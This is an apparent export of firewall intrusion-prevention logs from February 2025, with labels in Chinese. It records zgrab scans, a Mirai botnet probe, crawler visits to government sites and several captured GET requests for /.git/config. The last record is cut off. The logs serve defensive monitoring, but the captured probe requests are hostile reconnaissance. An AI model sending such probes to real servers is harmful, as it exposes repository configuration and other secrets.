,{"LogType":"1","ID":"1766","UserID":"720898","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":55748,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T18:45:29\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"4.156.21.82\",\"User\":\"4.156.21.82\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/hudson\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"327682","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":59201,\"DestPort\":16001,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:10:17\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.239\",\"User\":\"15.235.224.239\",\"DestIPAddr\":\"121.30.199.65\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.65\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"786434","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":58390,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T18:44:54\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"4.156.21.82\",\"User\":\"4.156.21.82\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.82\",\"HttpFirstLine\":\"\/hudson\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"393218","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":58968,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":45845,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"访问敏感文件.git_config通信流量\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T21:32:38\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"134.199.151.205\",\"User\":\"134.199.151.205\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/.git\/config\",\"Payload\":\"GET \/.git\/config HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.79\\\\0d\\\\0aUser-agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/81.0.4044.129 Safari\/537.36\\\\0d\\\\0aAccept-Encoding: gzip, deflate\\\\0d\\\\0aAccept: *\/*\\\\0d\\\\0aConnection: keep-alive\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"SensitiveInfo\",\"MethodSubNameCN\":\"敏感信息泄露\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"851970","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":49781,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:38:21\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"458754","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":50568,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":45845,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"访问敏感文件.git_config通信流量\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T21:07:47\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"134.199.151.205\",\"User\":\"134.199.151.205\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.82\",\"HttpFirstLine\":\"\/.git\/config\",\"Payload\":\"GET \/.git\/config HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.82\\\\0d\\\\0aUser-agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/81.0.4044.129 Safari\/537.36\\\\0d\\\\0aAccept-Encoding: gzip, deflate\\\\0d\\\\0aAccept: *\/*\\\\0d\\\\0aConnection: keep-alive\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"SensitiveInfo\",\"MethodSubNameCN\":\"敏感信息泄露\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"917506","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":49781,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:38:20\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"524290","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":41287,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T19:02:09\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"983042","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":46446,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":45845,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"访问敏感文件.git_config通信流量\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:36:09\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"35.216.149.150\",\"User\":\"35.216.149.150\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/.git\/config\",\"Payload\":\"GET \/.git\/config HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.80\\\\0d\\\\0aUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko\/20100101 Firefox\/103.0 abuse.xmco.fr\\\\0d\\\\0aAccept-Encoding: gzip\\\\0d\\\\0aConnection: close\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"SensitiveInfo\",\"MethodSubNameCN\":\"敏感信息泄露\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"589826","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":41287,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T19:02:08\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1048578","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":35580,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":35419,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"僵尸网络:Mirai_2.0\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:30:49\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"196.251.85.250\",\"User\":\"196.251.85.250\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80:80\",\"HttpFirstLine\":\"\/login.rsp\",\"Payload\":\" Hello World\\\\0d\\\\0a\",\"MethodName\":\"MalwareTraffic\",\"MethodNameCN\":\"恶意流量\",\"MethodSubName\":\"BotnetTraffic\",\"MethodSubNameCN\":\"僵尸网络流量\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"655362","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":33620,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T18:45:40\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"4.156.21.82\",\"User\":\"4.156.21.82\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/hudson\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1114114","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":43464,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫:Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:12:12\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.70\",\"User\":\"111.225.148.70\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" pcq.datong12380.gov.cn\",\"HttpFirstLine\":\"\/robots.txt\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"720898","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":55748,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T18:45:29\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"4.156.21.82\",\"User\":\"4.156.21.82\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/hudson\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1179650","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":24756,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫:Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:45:27\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.30\",\"User\":\"111.225.148.30\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/view\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"786434","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":58390,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T18:44:54\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"4.156.21.82\",\"User\":\"4.156.21.82\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.82\",\"HttpFirstLine\":\"\/hudson\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1245186","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":22712,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫:Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:45:26\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.30\",\"User\":\"111.225.148.30\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/article_list.htm?itemId=115&parentId=0\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
||||||
,{"LogType":"1","ID":"1766","UserID":"851970","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":49781,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:38:21\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
|
,{"LogType":"1","ID":"1766","UserID":"1310722","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":58106,\"DestPort\":9000,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:38:55\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"172.169.190.151\",\"User\":\"172.169.190.151\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:9000\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 